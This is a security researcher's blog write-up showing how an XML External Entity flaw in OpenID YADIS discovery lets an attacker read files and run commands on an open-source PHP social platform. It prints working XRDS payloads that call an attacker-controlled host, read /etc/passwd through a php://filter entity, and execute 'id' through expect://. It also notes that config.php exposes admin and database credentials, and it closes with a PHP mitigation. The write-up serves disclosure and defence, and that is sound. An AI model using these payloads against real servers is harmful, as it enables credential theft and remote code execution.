Recently a security researcher reported a bug in Facebook that could potentially allow Remote Code Execution (RCE). His writeup of the incident is available here if you are interested. The thing that caught my attention about his writeup was not the fact that he had pwned Facebook or earned $33,500 doing it, but the fact that he used OpenID to accomplish this. After having a quick look at the output from the PoC and rereading the vulnerability description I had a pretty good idea of how the vulnerability was triggered and decided to see if any other platforms were vulnerable.
The basic premise behind the vulnerability is that when a user authenticates with a site using OpenID, that site does a ‘discovery’ of the user’s identity. To accomplish this the server contacts the identity server specified by the user, downloads information regarding the identity endpoint and proceeds with authentication. There are two ways that a site may do this discovery process, either through HTML or a YADIS discovery. Now this is where it gets interesting, HTML look-up is simply a HTML document with some meta information contained in the head tags:
1 2 3 4 |
<head> <link rel="openid.server" href="http://www.example.com/myendpoint/" /> <link rel="openid2.provider" href="http://www.example.com/myendpoint/" /> </head> |
Whereas the Yadis discovery relies on a XRDS document:
1 2 3 4 5 6 7 8 9 10 11 12 |
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7804:/raw</URI> <openid:Delegate>http://198.x.x.143:7804/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS> |
Now if you have been paying attention the potential for exploitation should be jumping out at you. XRDS is simply XML and as you may know, when XML is used there is a good chance that an application may be vulnerable to exploitation via XML External Entity (XXE) processing. XXE is explained by OWASP and I’m not going to delve into it here, but the basic premise behind it is that you can specify entities in the XML DTD that when processed by an XML parser get interpreted and ‘executed’.
From the description given by Reginaldo the vulnerability would be triggered by having the victim (Facebook) perform the YADIS discovery to a host we control. Our host would serve a tainted XRDS and our XXE would be triggered when the document was parsed by our victim. I whipped together a little PoC XRDS document that would cause the target host to request a second file (198.x.x.143:7806/success.txt) from a server under my control. I ensured that the tainted XRDS was well formed XML and would not cause the parser to fail (a quick check can be done by using http://www.xmlvalidation.com/index.php)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 |
<?xml version="1.0" standalone="no"?> <!DOCTYPE xrds:XRDS [ <!ELEMENT xrds:XRDS (XRD)> <!ATTLIST xrds:XRDS xmlns:xrds CDATA "xri://$xrds"> <!ATTLIST xrds:XRDS xmlns:openid CDATA "http://openid.net/xmlns/1.0"> <!ATTLIST xrds:XRDS xmlns CDATA "xri://$xrd*($v*2.0)"> <!ELEMENT XRD (Service)*> <!ELEMENT Service (Type,URI,openid:Delegate)> <!ATTLIST Service priority CDATA "0"> <!ELEMENT Type (#PCDATA)> <!ELEMENT URI (#PCDATA)> <!ELEMENT openid:Delegate (#PCDATA)> <!ENTITY a SYSTEM 'http://198.x.x.143:7806/success.txt'> ]> <xrds:XRDS xmlns:xrds="xri://$xrds" xmlns:openid="http://openid.net/xmlns/1.0" xmlns="xri://$xrd*($v*2.0)"> <XRD> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>http://198.x.x.143:7806/raw.xml</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> <Service priority="0"> <Type>http://openid.net/signon/1.0</Type> <URI>&a;</URI> <openid:Delegate>http://198.x.x.143:7806/delegate</openid:Delegate> </Service> </XRD> </xrds:XRDS> |
In our example the fist <Service> element would parse correctly as a valid OpenID discovery, while the second <Service> element contains our XXE in the form of <URI>&a;</URI>.
To test this we set spun up a standard LAMP instance on DigitalOcean and followed the official installation instructions for a popular, OpenSource, Social platform that allowed for OpenID authentication. And then we tried out our PoC.
It worked! The initial YADIS discovery (orange) was done by our victim (107.x.x.117) and we served up our tainted XRDS document. This resulted in our victim requesting the success.txt file (red). So now we know we have some XXE going on. Next we needed to turn this into something a little more useful and emulate Reginaldo’s Facebook success. A small modification was made to our XXE payload by changing the Entity description for our ‘a’ entity as follows: <!ENTITY a SYSTEM ‘php://filter/read=convert.base64-encode/resource=/etc/passwd’>. This will cause the PHP filter function to be applied to our input stream (the file read) before the text was rendered. This served two purposes, firstly to ensure the file we were reading to introduce any XML parsing errors and secondly to make the output a little more user friendly.
The first run with this modified payload didn’t yield the expected results and simply resulted in the OpenID discovery being completed and my browser trying to download the identity file. A quick look at the URL, I realised that OpenID expected the identity server to automatically instruct the user’s browser to return to the site which initiated the OpenID discovery. As I’d just created a simple python web server with no intelligence, this wasn’t happening. Fortunately this behaviour could be emulated by hitting ‘back’ in the browser and then initiating the OpenID discovery again. Instead of attempting a new discovery, the victim host would use the cached identity response (with our tainted XRDS) and the result was returned in the URL.
“The simple python webserver didn't obey the redirect instruction in the URL and the browser would be stuck at the downloaded identity file.”
“Hitting the back button and requesting OpenID login again would result in our XXE data being displayed in the URL.”
Finally all we needed to do was base64 decode the result from the URL and we would have the contents of /etc/passwd.
“The decoded base64 string yielded the contents of /etc/passwd”
This left us with the ability to read *any* file on the filesystem, granted we knew the path and that the web server user had permissions to access that file. In the case of this particular platform, an interesting file to read would be config.php which yields the admin username+password as well as the mysql database credentials. The final trick was to try and turn this into RCE as was hinted in the Facebook disclosure. As the platform was written in PHP we could use the expect:// handler to execute code. <!ENTITY a SYSTEM ‘expect://id’>, which should execute the system command ‘id’. One dependency here is that the expect module is installed and loaded (http://de2.php.net/manual/en/expect.installation.php). Not too sure how often this is the case but other attempts at RCE haven’t been too successful. Armed with our new XRDS document we reenact our steps from above and we end up with some code execution.
“RCE – retrieving the current user id”
And Boom goes the dynamite.
All in all a really fun vulnerability to play with and a good reminder that data validation errors don’t just occur in the obvious places. All data should be treated as untrusted and tainted, no matter where it originates from. To protect against this form of attack in PHP the following should be set when using the default XML parser:
libxml_disable_entity_loader(true);
A good document with PHP security tips can be found here: http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html
./et